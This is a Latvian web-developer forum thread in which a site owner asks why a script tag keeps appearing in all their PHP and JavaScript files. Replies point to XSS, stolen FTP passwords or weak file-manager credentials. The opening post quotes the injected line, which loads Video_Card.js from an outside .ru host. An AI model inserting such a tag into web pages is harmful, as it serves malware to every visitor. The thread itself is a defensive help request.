Jump to content
php.lv forumi

Uzmācīgie vīrusi.


forSilence

Recommended Posts

Tātad saskāros ar tādu problēmu, kad manai mājaslapai uzbrū visādi vīrus. Visos index.php un javascript failos tie kkādīgi iedabū iekšā savus Javascript, un antivītus tos uztev kā vīrusus, kā pret tādiem var izsargāties. Reku viens piemērs.

<script type="text/javascript" src="http://pantscow.ru:8080/Video_Card.js"></script>
<!--7458ca7842b7c19a28e6ba7806246db8-->

Jo ir apnici visu laiku katrā failā dzēst ārā so rindiņu.

Link to comment
Share on other sites

Saucās XSS uzbrukumi... derētu filtrēt datus, kas tiek saņemti no lietotāja atkarīgi nolūka (vai DB, vai attēlošanai lapā)..

 

Vēl, protams, jautājums, vai tā ir tevis taisīta sistēma, vai gatavs visiem pieejams produkts..

Link to comment
Share on other sites

tas visticamāk ir uz tava datora. sūdīgs antivirus tev. vai arī vienk kkāds process sistēmā skenē failus un pieliek klāt šādas rindiņas. ja ir tāds process, tad tas nav vīrusss un neviens antivirus viņu neķers, jo vinsh neko sliktu nedara ... vieniigi vari meeginaat pats to kodu kādā failā ieliekt un noseivot failu. (vai antivirus kko saka vai nee)

Link to comment
Share on other sites

Mana mājas lapa neatrodas uz mana datora, tā hostējas techpoint telpās. Un mana mājas lapa nav gatavs cms, tikai gatavi php skripti kas ņemti internetā. Bet ieejot manā mājas lapā uzreiz mans antivīrus uzrāda šo skriptu, kā vīrusu. Un arī daudziem citiem, kad ieiet manā mājas lapā uzrāda, šo skriptu kā vīrusu.

Edited by forSilence
Link to comment
Share on other sites

Kad man klientam šitāda lieta notikās - failus bija labojis FTP useris laikā, kad vienīgais usera lietotājs zvēr ka nav pat domājis par saitu. Attiecīgi - sliecos domāt, ka problēmas vainu ar FTP klientu vai serveri. Tb klientā kāds paroļu zaglis vai kas tamlīdzīgs.

Ā un IP, no kuras notikās konekcijas, pilnīgi kreisa āzijas...

 

Tā ka, ja ir iespējams - pačeko logus.

Link to comment
Share on other sites

ir bijusi arii man taada pieredze ka caur ftp labo failus. vai suudiiga ftp parole vai arii tev pc ir kaads keylogger kas tavu paroli aizsuutiijis sliktajiem puišiem. vai arī nosnīfota. vai arī hosteris tās pārdod :D, viena ftp pass, 3 aliņi :D

Link to comment
Share on other sites

Vienu izplatītāko iespēju, kā varēja ievietot skriptus, Briedis jau pieminēja. Tomēr ja skripti ir failos pa tiešo, tad tur ir kas sarežģītāks un jāskatās pa kurieni tikuši klāt Taviem failiem. Papildus šeit jau aprakstītajai ftp paroļu un servera drošības pārbaudei pārliecinies vai ar php skriptiem viss ir kārtībā (tiem kas darbojas ar failiem, ja tādi ir). Iespējams Tu izmanto kādus ne sevis taisītos skriptus tieši darbībām ar failiem (failu manageriem), ja tādi ir, pārliecinies ka esi nomainījis visas noklusētās paroles, caur tiem var tikt klāt, pašam ir gadījies. Ja Tavs CS serveris ir uzstādīts tādā veidā ka tā izpildes skripti var piekļūt arī otrajai mājas lapai, tad caur to arī varēja piekļūt failiem, tātad tur arī jāpārbauda failu apstrādes skripti.

Edited by Maris-S
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...
×
×
  • Create New...